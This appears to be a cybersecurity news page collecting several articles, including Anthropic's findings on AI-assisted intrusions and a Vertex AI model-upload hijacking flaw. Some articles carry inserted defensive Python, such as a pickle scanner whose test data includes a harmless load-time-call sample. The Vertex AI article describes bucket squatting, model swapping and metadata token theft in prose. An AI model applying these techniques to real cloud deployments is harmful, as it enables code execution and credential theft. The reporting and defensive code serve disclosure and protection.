Among all observed cases, malware development was the most common use of AI. Researchers found that 560 of the 832 analyzed accounts, representing more than two-thirds of the dataset, used AI-assisted tools to help create or modify malicious software. While this finding was expected, the more notable change appeared elsewhere.

Throughout the study period, researchers recorded a movement away from AI-assisted initial access activities and toward post-compromise operations. One example was account discovery, a process attackers use to identify valid user accounts within a breached network. AI-assisted account discovery increased by 8.9% during the reporting period. By contrast, AI-supported phishing activity declined by 8.6%.

The data also showed growing use of AI during lateral movement operations. Lateral movement refers to the actions attackers take after entering a network to expand their access and reach more valuable systems, users, or data repositories. According to the report, 54 of the 832 observed actors used AI assistance during this stage of an intrusion.

Historically, activities such as account discovery, privilege escalation, and lateral movement have been associated with more experienced operators because they require a stronger understanding of network environments and attack workflows. Researchers argue that AI is reducing those technical barriers, allowing a broader range of actors to perform tasks that were previously more difficult to execute effectively.

This change became visible in the study's risk assessment data. During the first half of the observation period, approximately 33% of threat actors were categorized as medium-risk or higher. During the second half, that proportion rose to 56%. Researchers described this increase as evidence that AI is helping a larger segment of the threat landscape carry out more advanced cyber activity.

The findings also raise questions about how the industry evaluates attacker sophistication. Security teams have long treated the number of techniques used during an attack as an indicator of capability. Anthropic's analysis suggests that this relationship is becoming less reliable in AI-assisted environments.

Researchers found only a small difference between lower-risk and higher-risk actors when measuring the number of techniques used. Less sophisticated actors employed an average of 16 techniques, while the most capable actors averaged 20. The narrow gap indicates that technique counts alone may no longer provide a meaningful way to prioritize threats.

The same pattern appeared when researchers examined how attackers interacted with AI systems. Whether actors used Claude Code, direct API access, or standard chat interfaces showed little connection to their assessed risk level. Simply identifying which AI tool was used did not provide a clear indication of the threat posed by an actor.

Instead, researchers found that the location of AI usage within the attack lifecycle was a stronger indicator of risk. Higher-risk operators tended to apply AI to technically demanding stages of an intrusion, including internal reconnaissance, privilege escalation, and lateral movement. These activities often have a direct impact on how effectively an attacker can establish control over a compromised environment.

Even that distinction may not remain useful indefinitely. Researchers observed that these more advanced use cases are gradually spreading throughout the broader threat ecosystem. As AI tools become more accessible and capable, activities once associated with a smaller group of highly skilled operators may become increasingly common.

Anthropic identified another characteristic that separated the most dangerous actors from the rest. Rather than using AI for isolated tasks, some operators built systems around AI models that connected multiple attack stages together. This allowed AI to support planning, execution, and decision-making across larger portions of an operation with limited human involvement.

Researchers describe this capability as agentic attack orchestration. In practical terms, it refers to AI systems that can assist with coordinating different phases of an intrusion, helping move an attack from one stage to another without requiring constant manual direction from an operator.

According to the report, this emerging behavior exposes a limitation in existing cybersecurity frameworks. MITRE ATT&CK was designed to document attacker actions and techniques. It was not built to measure the degree of autonomy involved when AI systems help coordinate those actions.

Anthropic illustrated this challenge using a cyber-espionage campaign it disrupted in November 2025. The operation involved attempts to use Claude Code in support of intrusion activity targeting organizations in multiple regions with relatively little direct human intervention.

When researchers mapped the operation to MITRE ATT&CK, it generated a profile containing 30 techniques across 13 tactics. On paper, that profile appeared comparable to many medium-risk actors included in the study. However, Anthropic's internal evaluation system assigned the operation the maximum possible risk score of 100.

Researchers argue that the discrepancy exists because current frameworks focus on what actions occur during an attack rather than how those actions are coordinated. An AI-assisted system capable of executing commands, identifying vulnerabilities, collecting credentials, and adapting to changing conditions throughout an intrusion presents a different operational challenge than a human manually performing each step.

The report notes that there are currently no ATT&CK categories specifically designed to capture autonomous orchestration, automated chaining of attack stages, or the reduction of human decision-making throughout an attack lifecycle.

Anthropic says it is actively discussing potential framework updates with MITRE to better account for AI-enabled attack behaviors. The company has also used insights from the research to strengthen safeguards within its own models, including controls intended to detect and prevent misuse involving malware development and large-scale data theft attempts.

For defenders, the findings suggest that traditional indicators may no longer provide a complete picture of cyber risk. A threat actor using AI to automate portions of an attack may achieve outcomes similar to those of a more experienced operator performing the same tasks manually. Likewise, an individual using a basic chat interface could potentially conduct operations that resemble those performed through more advanced integrations.


Meta Faces Privacy Questions After Secret Face Recognition Code Discovery


For many years, the concept of facial recognition in consumer wearables remained a largely theoretical discussion confined to research laboratories, privacy concerns, and product development. With the discovery that Meta had quietly embedded facial recognition-related code within its Meta AI mobile application, the software that powers and supports its Ray-Ban and Oakley smart glasses ecosystem, this conversation is moving closer to reality. 

The discovered system, known as "NameTag," is designed to process images captured through the smart glasses' cameras, generate biometric information, and match it with local data in order to recognize individuals in real time. The findings have heightened scrutiny of the integration of advanced computer vision capabilities into everyday consumer devices, particularly when these capabilities appear in applications that are installed on tens of millions of smartphones well in advance of official announcements. 

Additionally, Meta's smart glasses platform continues to expand its capabilities, raising questions regarding transparency, biometric data handling, and the future of artificial intelligence-powered wearable technology. In further analysis of the software architecture, it is apparent that the NameTag framework was not limited to experimental code fragments, but rather was integrated into the Meta AI application, which is a mandatory companion application for several smart glasses features and has been downloaded by over 50 million people. 

An analysis of the system indicates that it was designed to capture facial imagery through the glasses, generate unique biometric templates known as faceprints, and compare the collected data with data stored locally on a user's device. Upon identifying a match, the application could generate recognition alerts to the wearer, while faces that could not immediately be matched were reportedly cropped, catalogued, and queued for future consideration. 

In the investigation, researchers noted that three separate machine learning models associated with the feature were already installed on user devices to handle face detection, image extraction, and biometric conversion, respectively. In earlier application builds, the capability was also referenced under the label "Connections," which implies a potential use case that could involve assisting users in recalling individuals they had previously encountered. 

A portion of the technical analysis was reviewed by independent security experts who emphasized the findings of the study. Although the feature was never publicly announced, researchers indicated that the underlying components appeared sufficiently developed to facilitate operational testing. 

Researchers reported that one security researcher uploaded a faceprint associated with French philosopher Michel Foucault to demonstrate the system's recognition workflow, which triggered a notification indicating successful identification of the user. Given Meta's long-standing involvement with facial-recognition technologies, which have been the subject of both commercial interest and regulatory pressure in the past, this disclosure has reignited scrutiny. 

Previously, the company operated one of the largest facial-recognition systems for consumers by using Facebook's photo-tagging infrastructure before discontinuing the program in 2021 and destroying more than a billion biometric records. The development of a new facial-recognition framework against this backdrop has inevitably drawn the attention of privacy advocates and industry observers. 

A Meta representative has, however, strongly rejected interpretations that the technology had been secretly deployed or prepared for public release. The code, according to Meta spokesperson Ryan Daniels, reflects ongoing research and product exploration and not a finished consumer feature. The spokesperson said no facial-recognition capability has been offered to users and no decision has been made regarding its implementation in the future. 

The company will not construct a centralized facial-recognition database, he asserted, and stated that any eventual deployment would be disclosed in a clear manner. Andy Stone echoed this position, arguing that characterization of the technology as covertly released is misleading regarding both its purpose and status at present. Despite this, the episode illustrates the tension between rapidly advancing AI-powered wearable capabilities and the security expectations associated with technologies designed to process highly sensitive biometric data. 

The debate intensified further when the Threat Lab of the Electronic Frontier Foundation confirmed certain aspects of the earlier findings and noted that Meta only removed the code related to facial recognition once the issue gained significant public attention. The organization cautioned, however, that deletion does not necessarily indicate an end to development efforts. 

The investigation also found an apparent connection between Meta and the biometric technology provider Rank One Computing, a provider of facial recognition solutions for the United States Army and the U.S. Rank One's technology has been linked to Meta AI, the application used in conjunction with the company's smart glasses ecosystem, according to the report. 

According to the report, the contract permitted access to advanced biometric features, including facial recognition and liveness detection systems. These systems are designed to distinguish a real individual from a photograph, mask, or other spoofing attempt. Researchers expressed concern about the narrow technological gap between government-grade surveillance platforms and consumer-facing wearable devices, arguing that the gap is narrowing rapidly. 

Neither company has publicly clarified the reported partnership. Rank One Computing reportedly declined to respond, while Meta maintains that no consumer-facing facial-recognition features have been released and no final product decision has been reached. 

Additionally, Meta did not confirm if third-party biometric engines with military-grade accuracy are being evaluated for future wearable products. Nonetheless, the revelations have renewed discussion about Meta's long and often controversial history with facial recognition. It was due to years of regulatory pressure that the company dismantled its large-scale facial recognition infrastructure on Facebook in 2021, despite hundreds of millions of users opting into the system previously. 

Recently, Meta paid $1.4 billion to settle a lawsuit over allegations relating to the collection of biometric data. It was reported earlier this year that Meta had explored ways to use information related to its social media ecosystem to identify individuals using smart glasses. Further concerns have been raised about the integration of biometric intelligence into future consumer products. 

The issue of privacy and cybersecurity goes beyond the release of a single product or feature. Through the transformation of a person's face into a persistent digital credential that can be stored, matched, and analyzed, facial recognition systems fundamentally alter the balance between anonymity and identification in public spaces. 

A number of advocacy organizations have argued that such technologies are disproportionately damaging to marginalized groups, contribute to misidentification, and create avenues for unauthorized surveillance. The security threat associated with biometric identifiers is that, unlike passwords, they cannot simply be changed once they have been exposed. 

The evolution of smart glasses into platforms combining cameras, microphones, artificial intelligence, and biometric processing is increasingly challenging regulators, technologists, and consumers alike. There is the question as to whether privacy safeguards can keep pace with the capabilities being built into the next generation of wearable computing devices. 

A growing number of wearable devices can collect, analyze, and interpret real-world data, thereby expanding the debate from what a wearable device can achieve to how it should be utilized responsibly. In Meta's facial-recognition prototype, questions arise that illustrate an underlying cybersecurity and privacy challenge faced by the industry: ensuring that innovation relating to biometric data is accompanied by transparency, accountability, and meaningful user protections. 

Organizations and consumers should take note that features involving identity recognition should be carefully scrutinized, particularly as the lines between convenience, surveillance, and privacy become increasingly blurred.

Why Privacy-Conscious Users Should Think Twice Before Storing Sensitive Files on Google Drive

 

Google Drive has become an essential tool for millions of users worldwide. Whether it's storing contacts, backing up WhatsApp chats, or saving photos, videos, and important documents, the platform serves as a central hub for digital storage. Its deep integration with Google's ecosystem makes it a convenient choice for Android and Gmail users alike.

However, while Google Drive offers robust security against cyber threats, questions remain about whether it is the best place to store highly sensitive personal information. Documents such as passport scans, banking records, legal contracts, and tax returns may require an additional layer of protection beyond what the service provides by default.

From a security standpoint, Google Drive employs industry-standard safeguards. Data is encrypted while being transferred using TLS protocols, and files stored on Google's servers are protected with AES-128 encryption. Users can further strengthen account security through features like passkeys and two-factor authentication.

The key concern, however, lies in how the encryption system works. Unlike services that provide end-to-end encryption, Google retains control of the encryption keys used to access stored files. This means the company has the technical ability to decrypt and view user data when necessary.

"When you upload a file, Google encrypts it with a unique data encryption key, then encrypts that key with another key it controls, and stores both on its servers. To read the file, Google's systems unwrap the keys on the fly. With true end-to-end encryption, only your device holds the key, so even the service provider sees nothing but scrambled bytes. Google's setup doesn't meet that bar."

As a result, while hackers and unauthorized third parties face significant barriers in accessing files, Google itself can access stored content. Additionally, government agencies or courts may compel the company to share user data through legal processes because Google possesses the necessary decryption keys.

Another privacy consideration is automated content scanning. Google uses systems that review files for policy enforcement purposes, including identifying known illegal content and potential violations of its terms of service. Although the company states that Drive content is not used for advertising purposes, automated systems can sometimes generate false positives, potentially leading to account restrictions or suspensions.

Artificial intelligence is also expanding Google's access to stored data. As Gemini becomes more deeply integrated into Workspace products, it requires permission to analyze files in order to generate summaries and provide contextual assistance. While Google maintains that Drive files are not used to train its general AI models, some privacy advocates argue that increased AI integration broadens the potential exposure of personal information.

"This doesn't mean Google is malicious or will snoop on you. It means the threat model is different from what most people assume. You're not just trusting Google to fend off hackers; you're trusting it never to read, mishandle, or be compelled to share your data."

For users seeking stronger privacy protections, encrypting files before uploading them to Google Drive is often recommended. Applications such as Cryptomator allow users to create encrypted vaults on their devices, ensuring that files remain unreadable to Google. VeraCrypt is another option that enables users to create secure encrypted containers that can be synced to cloud storage services.
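The difference between the provider-held key scheme in the quote above and encrypting before upload can be shown in a few lines. This is an added example, not code from Google, Cryptomator or VeraCrypt: it assumes the third-party `cryptography` package is installed, `ProviderStore`, `seal` and `unseal` are hypothetical names, and the AES-GCM mode, key sizes and `CSE1` file tag are this example's choices, not a description of any product's format.

```python
"""Added illustration: provider-held keys versus a key only the user holds."""
import hashlib
import os

from cryptography.exceptions import InvalidTag
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

MAGIC = b"CSE1"  # file tag invented for this example


class ProviderStore:
    """Toy model of provider-managed envelope encryption: each file gets its
    own data key (DEK), and the DEK is wrapped by a key the provider holds."""

    def __init__(self):
        self._kek = AESGCM.generate_key(bit_length=256)  # stays with the provider
        self._objects = {}

    def upload(self, name: str, data: bytes) -> None:
        dek = AESGCM.generate_key(bit_length=256)        # fresh key per file
        n_data, n_key = os.urandom(12), os.urandom(12)
        aad = name.encode()                              # bind blobs to the name
        self._objects[name] = (
            n_data, AESGCM(dek).encrypt(n_data, data, aad),
            n_key, AESGCM(self._kek).encrypt(n_key, dek, aad),  # wrapped DEK
        )

    def provider_read(self, name: str) -> bytes:
        """What the provider's own systems (or anyone who can compel them)
        obtain: unwrap the DEK with the KEK, then decrypt the file."""
        n_data, blob, n_key, wrapped = self._objects[name]
        aad = name.encode()
        dek = AESGCM(self._kek).decrypt(n_key, wrapped, aad)
        return AESGCM(dek).decrypt(n_data, blob, aad)


def _derive_key(passphrase: str, salt: bytes) -> bytes:
    # scrypt from the standard library; the parameters are example values
    return hashlib.scrypt(passphrase.encode(), salt=salt, n=2**14, r=8, p=1, dklen=32)


def seal(passphrase: str, data: bytes, name: str) -> bytes:
    """Encrypt on the user's device before upload; the key never leaves it."""
    salt, nonce = os.urandom(16), os.urandom(12)
    sealed = AESGCM(_derive_key(passphrase, salt)).encrypt(nonce, data, name.encode())
    return MAGIC + salt + nonce + sealed


def unseal(passphrase: str, blob: bytes, name: str) -> bytes:
    """Decrypt a sealed file; fails closed on a wrong passphrase or tampering."""
    if len(blob) < 48 or blob[:4] != MAGIC:   # tag + salt + nonce + GCM tag
        raise ValueError("not a sealed file")
    salt, nonce, sealed = blob[4:20], blob[20:32], blob[32:]
    try:
        return AESGCM(_derive_key(passphrase, salt)).decrypt(nonce, sealed, name.encode())
    except InvalidTag:
        raise ValueError("wrong passphrase, wrong name, or modified file") from None


def exposure_demo(doc: bytes = b"constructed sample: passport scan bytes") -> dict:
    """Upload the same document plainly and sealed, then compare who can read it."""
    phrase = "constructed-example-passphrase"
    store = ProviderStore()
    store.upload("passport.pdf", doc)
    store.upload("passport.pdf.sealed", seal(phrase, doc, "passport.pdf"))
    seen = store.provider_read("passport.pdf.sealed")
    return {
        "provider_reads_plain_upload": store.provider_read("passport.pdf") == doc,
        "provider_sees_sealed_plaintext": doc in seen,
        "owner_recovers_sealed": unseal(phrase, seen, "passport.pdf") == doc,
    }


if __name__ == "__main__":
    for check, result in exposure_demo().items():
        print(f"{check}: {result}")
```

A sealed file with a forgotten passphrase stays unreadable to its owner as well, since no second copy of the key exists anywhere.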

Those looking for built-in privacy protections may consider alternative platforms. Services such as Proton Drive, Tresorit, and Sync.com offer end-to-end encryption, ensuring that providers cannot access the contents of user files because they do not possess the decryption keys.

There are trade-offs, however. End-to-end encrypted files often cannot be searched by content, previewed in a browser, or edited collaboratively in the same way as standard cloud storage files. Additionally, users are solely responsible for managing recovery credentials, meaning forgotten passwords may result in permanent loss of access.

For particularly sensitive documents, some users may choose to avoid cloud storage altogether. External hard drives or self-hosted solutions such as Nextcloud can provide greater control over personal data while reducing dependence on third-party providers.

Despite these concerns, Google Drive remains a secure and practical solution for everyday storage needs, including photos, shared documents, and routine work files. The issue is less about security and more about privacy.

"The privacy story shifts when you start storing things that would hurt to lose to a stranger, a Google reviewer, or a court order. For those files, the answer isn't to abandon Drive but to stop treating it as a vault. Encrypt sensitive documents before you upload, or move them to a service that can't read them at all. The few minutes of friction are worth knowing that the most personal pieces of your life aren't sitting on a server with someone else's keys."

For privacy-focused users, the best approach may be to continue using Google Drive for convenience while reserving encrypted storage solutions for highly confidential files.

Ransomware Gangs Splinter as Cyber Threat Becomes More Volatile

 

Cybercrime is moving through a major reset as the ransomware world shifts away from big, organized cartels and toward smaller, more volatile splinter groups. Speaking at Infosecurity Europe 2026, William Lyne, Head of Economic and Cybercrime at the Metropolitan Police Service, said the underground market has become a highly accessible ecosystem where criminals can buy tools, services, and stolen data with ease. He described it as a place where threat actors can get almost everything they need, except a good drink. 

The biggest driver behind this change is convenience. Cryptocurrencies have removed one of the oldest bottlenecks in cybercrime by making it much easier to cash out illegal profits, while underground marketplaces now provide ransomware kits, phishing services, infrastructure, and support on demand. That lower barrier to entry has blurred the old lines between hacktivists, criminal gangs, and state-linked actors, creating a blended threat environment that is far more crowded and harder to police.

Lyne warned that law enforcement crackdowns are also reshaping the market. When large, centralized groups such as LockBit are disrupted, their affiliates do not disappear; they scatter into smaller factions, each trying to rebuild revenue streams in a less visible way. The result is a more fragmented and “post-trust” criminal scene, where weaker internal controls and looser coordination can make attackers more aggressive, reckless, and unpredictable. 

The threat is also becoming more global. Lyne said the ransomware ecosystem is no longer dominated by traditional Russian-speaking hubs, with actors now emerging from Brazil, Türkiye, and English-speaking groups such as Scattered Spider. At the same time, criminals are increasingly using AI to search through hoarded corporate data, turning old thefts into fresh extortion opportunities and new monetization schemes. 

For police and security teams, the response must go beyond arrests alone. Lyne said the Met Police cannot “arrest its way out” of the problem and instead needs to focus on disrupting infrastructure, weakening trust inside criminal networks, and working more closely with private-sector defenders. In practical terms, that means security teams should expect a ransomware landscape that is smaller in structure but sharper in impact, where fragmented gangs may strike faster and with fewer rules than the cartels they replaced.

META Threat Landscape Report Q1 2026: Ransomware, Data Breaches and Hacktivism Rise Across Middle East, Turkey and Africa

 

Early 2026 saw sharper cyber aggression throughout the Middle East, Turkey, and Africa, fueled less by isolated incidents than by coordinated ransomware attacks, politically charged hacking efforts, and repeated exposure of sensitive information. Notably, Cyble's regional analysis highlights how public institutions, financial entities, infrastructure firms, and power providers faced relentless pressure from diverse digital adversaries during those months. Amid shifting tactics, one pattern held steady - attack volume climbed without pause. Early in the year, ransomware kept gaining ground across the region. 

Across META nations, 116 cases came to light between January and March. Leading the list was Turkey, with the UAE trailing just behind. Intrusions hit South Africa and Egypt hard, too - frequent probes and breakdowns marked their networks. Known crews like Gentlemen, INC Ransom, Qilin, Tengu, and LockBit stayed busy through the period. Each group showed steady signs of operation during those months. What stands out is construction being hit hardest, then government offices, police departments, banks, and power companies. Because these sectors manage vital systems and confidential information, they draw hackers aiming to profit or cause chaos. 

Notably, ransomware crews are acting more like businesses - some run subscription-style services so partners can launch attacks faster and wider. Terabytes of sensitive files surfaced online, allegedly pulled from Qatar’s energy infrastructure - login details, cloud backups, all circulating without permission. While ransomware grabbed headlines, leaked datasets kept spreading just beneath the surface. Cyber bazaars active throughout the year moved quietly, swapping access tokens and corporate records like currency. Healthcare providers found themselves exposed. So did hotels, sports leagues, even digital influencers promoting brands. 

A single hacker boasted control over massive archives - one claim among many. State agencies showed up repeatedly in breach reports, their systems probed by actors with unclear allegiances. Motives varied: some sought profit, others appeared driven by surveillance goals or national interests. What stands out is how often attackers used known weaknesses to break into systems. Soon after flaws became public, they appeared in hacking attempts - some quickly listed by CISA as actively abused. Targeting focused heavily on corporate networks and defensive software, as well as services open to the web. 

One standout issue involved Ivanti’s mobile management tool, where a severe bug allowed remote control without login verification. Access like that remains appealing; it skips the need to harvest passwords entirely. Throughout Q1 2026, hacktivism stayed prominently in view. A steady flow of leaked data, altered websites, and network floods hit thousands of online addresses in the META area. Tied closely to simmering global conflicts, especially around Israel and Iran, these actions grew more frequent. Rather than just causing outages, they began serving as tools to push narratives into online conversations. Digital platforms turned into stages where cyber acts echoed real-world disputes. 

Though quiet at first glance, new data from Cyble’s META Threat Landscape Report reveals how quickly digital dangers shift when crime blends with global tensions. Where politics and networks meet, risks climb - especially for firms tied to essential services or disputed industries. Instead of waiting, many now see value in tracking hidden signals, patching weaknesses faster, not just reacting after breaches occur. 

As hostile actors refine methods across the Middle East, Africa, Turkey, and Asia, one thing becomes clear: staying ahead means seeing more, acting sooner, adjusting constantly.

Security Bug in Google Vertex AI Could Allow Model Upload Hijacking

 




Google has addressed a security flaw in the Python SDK for Vertex AI after researchers demonstrated that attackers could potentially intercept machine learning model uploads and substitute them with malicious files.

The issue was identified by researchers from Palo Alto Networks' Unit 42 team, who disclosed the findings through Google's bug bounty program. According to the researchers, the vulnerability could be exploited without compromising a target organization's cloud environment, stealing credentials, or tricking users through phishing campaigns. Instead, the attack relied on weaknesses in how the SDK handled temporary storage locations during model uploads.

Researchers referred to the technique as "Pickle in the Middle." They reported no evidence that the flaw had been exploited outside of controlled testing environments. Google has since released security updates, and organizations using Vertex AI are advised to upgrade to version 1.148.0 or newer.


Predictable Storage Names Created an Opening

The vulnerability originated from the SDK's automatic staging process.

When developers uploaded a machine learning model without manually specifying a Cloud Storage bucket, the SDK generated a temporary bucket name based on information such as the Google Cloud project identifier and deployment region.

The problem was not that the bucket name could be predicted. The problem was that the SDK only checked whether the bucket existed. It did not verify whether that bucket belonged to the project performing the upload.

Because Cloud Storage bucket names are globally unique across Google Cloud, an attacker could create the expected bucket before the victim did. If that happened, model files uploaded by the victim could be redirected into infrastructure controlled by the attacker.

In practical terms, a developer could believe a model was being uploaded to their own cloud environment while the files were actually being delivered elsewhere.


Attackers Could Replace Models Before Deployment

After receiving the uploaded files, an attacker could modify or replace the model before Vertex AI retrieved it for deployment.

This becomes particularly important because many machine learning workflows rely on serialization formats such as Pickle and Joblib. These formats are commonly used to save trained models, but they also contain functionality capable of executing instructions when the file is loaded.

As a result, a manipulated model may do more than generate predictions. It can potentially run arbitrary code inside the environment responsible for serving the model.

Unit 42 researchers demonstrated that this behavior could be abused to execute attacker-controlled code inside Vertex AI's serving infrastructure.
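One way to inspect a serialized model before it is loaded, as an added example that is not code from Unit 42 or Google: it walks the pickle opcode stream with the standard `pickletools` module, never unpickles anything, and reports every import outside an allowlist. The allowlist roots and both sample streams are constructed for illustration.

```python
import pickle
import pickletools

STRING_PUSH = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}
MEMO_OPS = {"MEMOIZE", "PUT", "BINPUT", "LONG_BINPUT"}


def imported_globals(data):
    """List every module.name the stream would import, without loading it."""
    found, recent = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        name = opcode.name
        if name in STRING_PUSH:
            recent.append(arg)
        elif name in MEMO_OPS:
            continue                      # memo writes leave the stack top alone
        elif name in ("GLOBAL", "INST"):
            found.append(arg.replace(" ", ".", 1))   # arg is "module name"
            recent = []
        elif name == "STACK_GLOBAL":
            # module and attribute are the two strings pushed just before it;
            # anything less direct is reported as unresolved, not guessed
            found.append(".".join(recent[-2:]) if len(recent) >= 2
                         else "<unresolved>")
            recent = []
        else:
            recent = []
    return found


def disallowed_imports(data, allowed_roots):
    """Imports whose top-level module is not on the allowlist."""
    return [g for g in imported_globals(data)
            if g.split(".")[0] not in allowed_roots]


class _LoadTimeCall:
    """Constructed sample: its pickle names a callable to invoke on load."""
    def __reduce__(self):
        return (print, ("constructed sample",))


ALLOWED_ROOTS = {"numpy", "sklearn"}      # assumption: what this model needs
PLAIN = pickle.dumps({"weights": [0.1, 0.2], "bias": 0.5})
WITH_CALL_P4 = pickle.dumps(_LoadTimeCall(), protocol=4)   # STACK_GLOBAL form
WITH_CALL_P3 = pickle.dumps(_LoadTimeCall(), protocol=3)   # GLOBAL form
```

An allowlist keyed on the top-level module is coarse; a stricter policy would list exact `module.name` pairs.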


Researchers Exploited a Narrow Timing Window

The attack required the malicious file replacement to occur very quickly.

During testing, researchers observed that Vertex AI typically retrieved uploaded files roughly 2.5 seconds after the upload process completed.

To exploit this short interval, they created an automated Cloud Function that monitored the attacker-controlled bucket and immediately replaced newly uploaded files. The replacement process took approximately 1.4 seconds, allowing the malicious model to be swapped before Vertex AI accessed it.

This timing-based attack demonstrated that the vulnerability was practical under the right conditions rather than being a purely theoretical risk.


Proof-of-Concept Reached Beyond a Single Model

After achieving code execution, researchers tested what level of access could be obtained from the serving environment.

Their proof-of-concept extracted an OAuth token from the container's metadata service and used it to interact with resources available within Google's managed infrastructure.

According to the report, the token provided visibility into additional machine learning assets, model artifacts, TensorFlow files, BigQuery metadata, access control information, system logs, Kubernetes cluster identifiers, and internal infrastructure references.

The findings suggested that a successful compromise could potentially expose information beyond the originally targeted model deployment.


Exploitation Required Specific Conditions

The vulnerability was not universally exploitable.

Researchers noted that two requirements had to be met before the attack could succeed.

First, the expected default staging bucket could not already exist in the chosen deployment region. Second, the developer needed to rely on the SDK's default bucket-generation behavior rather than specifying a storage bucket manually.

The researchers noted that newly created Vertex AI projects often satisfy the first condition because the default bucket may not yet have been created.


Google Introduced Multiple Fixes

Unit 42 reported the issue to Google on March 5, 2026.

Google's initial response introduced additional randomness into bucket names by appending a UUID value, making bucket prediction substantially more difficult.

The company later strengthened the mitigation by implementing ownership validation checks. These checks ensure that automatically selected buckets belong to the project initiating the upload, preventing bucket-squatting attacks from succeeding.

The ownership verification mechanism was included in Vertex AI SDK version 1.148.0.
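The difference between an existence check and an ownership check, as an added example that is not the SDK's code: a toy in-memory model of a globally shared bucket namespace, with the pre-fix selection logic beside the hardened one. The naming scheme, project names and region are hypothetical.

```python
from dataclasses import dataclass, field


@dataclass
class BucketNamespace:
    """Toy stand-in for Cloud Storage: one namespace shared by all projects."""
    owners: dict = field(default_factory=dict)   # bucket name -> owning project

    def create(self, name, project):
        if name in self.owners:                   # names are globally unique
            raise FileExistsError(name)
        self.owners[name] = project


def default_staging_name(project, region):
    # Hypothetical scheme: the page says only that the name is derived from
    # values such as the project identifier and the region.
    return f"{project}-staging-{region}"


def select_exists_only(ns, project, region):
    """Pre-fix logic as the page describes it: an existing bucket is reused."""
    name = default_staging_name(project, region)
    if name not in ns.owners:
        ns.create(name, project)
    return name


def select_owner_checked(ns, project, region):
    """Hardened logic: an existing bucket must belong to the uploader."""
    name = default_staging_name(project, region)
    if name not in ns.owners:
        ns.create(name, project)
    elif ns.owners[name] != project:
        raise PermissionError(
            f"{name} exists but is owned by {ns.owners[name]}, not {project}")
    return name


def run_scenario():
    """Constructed scenario: another project holds the name before first upload."""
    ns = BucketNamespace()
    ns.create(default_staging_name("acme-ml", "us-central1"), "other-project")
    chosen = select_exists_only(ns, "acme-ml", "us-central1")
    lands_in = ns.owners[chosen]                  # who would receive the upload
    try:
        select_owner_checked(ns, "acme-ml", "us-central1")
        blocked = False
    except PermissionError:
        blocked = True
    return lands_in, blocked
```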

At the time the researchers published their findings, neither Google's Vertex AI security advisories nor the research report listed a CVE identifier for the vulnerability.


Recommendations for Organizations

Security teams using Vertex AI should verify that all environments are running updated versions of the google-cloud-aiplatform package. This includes development notebooks, machine learning pipelines, automated build systems, testing environments, and production deployments.

Researchers also recommend explicitly defining a staging bucket owned by the organization instead of relying on SDK defaults. This reduces the risk of storage misconfigurations and provides greater visibility into where machine learning artifacts are stored during deployment.
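A small audit for the version check recommended above, as an added example that is not from the researchers or Google: it classifies the `google-cloud-aiplatform` pin found in `pip freeze` or requirements text against 1.148.0. The environment names and listings are constructed.

```python
import re

PACKAGE = "google-cloud-aiplatform"
FIXED = (1, 148, 0)          # release the page names as carrying the fix

LINE = re.compile(r"([A-Za-z0-9._-]+)\s*(?:\[[^\]]*\])?\s*(?:==\s*(\S+))?")


def _normalize(name):
    # PEP 503: names compare case-insensitively; "-", "_" and "." are equal
    return re.sub(r"[-_.]+", "-", name).lower()


def sdk_status(freeze_text):
    """Classify the SDK pin found in one pip freeze / requirements listing."""
    for raw in freeze_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = LINE.match(line)
        if not m or _normalize(m.group(1)) != PACKAGE:
            continue
        version = m.group(2)
        if version is None or not re.fullmatch(r"\d+(\.\d+)*", version):
            return "review", version      # range, URL or pre-release pin
        parts = [int(p) for p in version.split(".")]
        parts += [0] * (3 - len(parts))   # "1.148" compares as 1.148.0
        return ("ok" if tuple(parts) >= FIXED else "outdated"), version
    return "absent", None


ENVIRONMENTS = {   # constructed listings, one per place the SDK is installed
    "notebook": "numpy==1.26.4\ngoogle-cloud-aiplatform==1.71.1\n",
    "ci-build": "Google_Cloud_AIPlatform==1.148.0  # pinned\n",
    "pipeline": "google-cloud-aiplatform>=1.100\n",
    "test": "requests==2.31.0\n",
}


def audit(environments):
    """Map each environment name to the status of its SDK pin."""
    return {env: sdk_status(text)[0] for env, text in environments.items()}
```

A "review" result means the listing does not pin an exact release, so the installed version has to be confirmed in the environment itself.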

The disclosure is the latest example of how weaknesses in supporting cloud infrastructure can affect AI systems. As organizations continue moving model development and deployment into managed cloud platforms, security reviews must extend beyond the model itself to include storage, deployment pipelines, permissions, and the services that support the AI lifecycle.

Iranian Crypto Giant Nobitex Added to US Sanctions List Amid Terror Financing Probe

 


The intersection of financial innovation, regulatory oversight, and national security has occupied digital asset platforms for years. Earlier this week, the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) imposed sanctions on Nobitex, Iran’s largest cryptocurrency exchange, as well as three other Iranian digital asset exchanges, bringing that intersection into sharp focus. 

The action, taken as part of the Trump Administration's Economic Fury campaign, reflects a significant concern that cryptocurrency infrastructure is being abused both to circumvent international sanctions and to facilitate illicit financial networks associated with government-backed activities. 

According to United States authorities, Nobitex allegedly processed more than half of Iran's cryptocurrency inflows in 2025, establishing itself as one of the most important hubs in Iran's digital asset ecosystem. This platform facilitates transactions related to terror financing, sanctions evasion operations, and entities associated with the Islamic Revolutionary Guard Corps (IRGC), including ransomware-related entities. 

According to Treasury officials, the platform was also instrumental in enabling the Central Bank of Iran to obtain substantial stablecoin reserves, highlighting how digital assets are increasingly being used to influence geopolitical and economic affairs. Even though Iran has been economically isolated for many years and has been undergoing mounting geopolitical tension, the digital asset sector has emerged as a significant financial ecosystem. 

Based on industry estimates, the cryptocurrency market in the country will be worth over $7.78 billion in 2025, reflecting the growing integration of digital assets into both commercial activities and international payment channels. 

Based on blockchain intelligence assessments, it is evident that wallet addresses associated with the Islamic Revolutionary Guard Corps (IRGC) accounted for more than half of the total value flowing into Iran's cryptocurrency ecosystem during the fourth quarter of 2025. In this regard, the country’s expanding virtual asset landscape has become increasingly intertwined with national security concerns. Within this environment, exchanges targeted by Washington occupy a dominant position. 

